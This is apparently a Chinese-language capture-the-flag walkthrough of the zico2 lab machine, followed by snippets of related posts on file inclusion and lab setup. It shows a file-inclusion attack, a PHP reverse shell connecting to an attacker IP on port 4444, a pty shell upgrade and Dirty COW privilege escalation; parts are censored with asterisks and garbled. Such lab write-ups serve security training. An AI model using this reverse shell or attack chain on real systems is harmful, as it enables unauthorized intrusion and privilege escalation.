kali滲透綜合靶機(五)--zico2靶機
一、主機發現
二、埠掃瞄
三、埠服務識別
四、漏洞發現
1.訪問發現可能存在檔案包含漏洞
2.測試是否存在檔案包含漏洞,下圖說明存在存在檔案包含漏洞
3.掃瞄**目錄
4.測試資料庫是否可寫內容,在資料庫插入 phpinfo();?>,然後結合檔案包含
然後結合檔案包含
5.在攻擊端寫**指令碼,然後在目標資料庫中寫入一段**載入位於攻擊端的**,結合檔案包含,然後在攻擊端開啟監聽
攻擊端**:
<?php
$sock=fsockopen("192.168.10.151",4444);exec("/bin/sh -i &3 2>&3");
?>
目標資料庫插入**:
6.新建乙個終端
python -c 'import pty;pty.spawn("/bin/bash")'
8. 然後編譯並執行,然後切換firefart賬戶,獲得管理員許可權
總結:1.資訊收集
2.檔案包含
3.髒牛提權
Web Pentester滲透靶機
下面分模組講解 檔案包含 很明顯這是乙個典型的包含,先在後面加個單引號,我們就可以得到物理路徑 下面我們看看能不能呼叫example.php中的動態包含函式包含passwd檔案內容 接著我們就可以利用他進行本地包含和遠端包含 我們還是先用單引號或者其他符號先去測試一下 還是會把我們的路徑爆出來,但是...
kali滲透靶機 實驗環境搭建資源 問題解析
一以下的內容是本人親自體驗所總結的,所用到的鏈結與資源均可放心使用,隨著本人自身學習的不斷深入,日後此篇文章會不斷地更新,讓我們共同進步共同發展 1 開啟bios 前提條件 bios已經虛擬開啟,如果未開啟,這裡檢視開啟步驟 進入bios不同的電腦品牌按鍵是不一樣的,檢視自己電腦開啟bios虛擬的按...
vulstudy靶機搭建(kali)
安裝docker apt get install docker.io 安裝docker pip install docker compose 安裝docker compose 使用主要分兩種 單獨執行乙個漏洞平台,同時執行多個漏洞平台 cd到需要執行的漏洞目錄下執行命令 cd vulstudy 漏洞...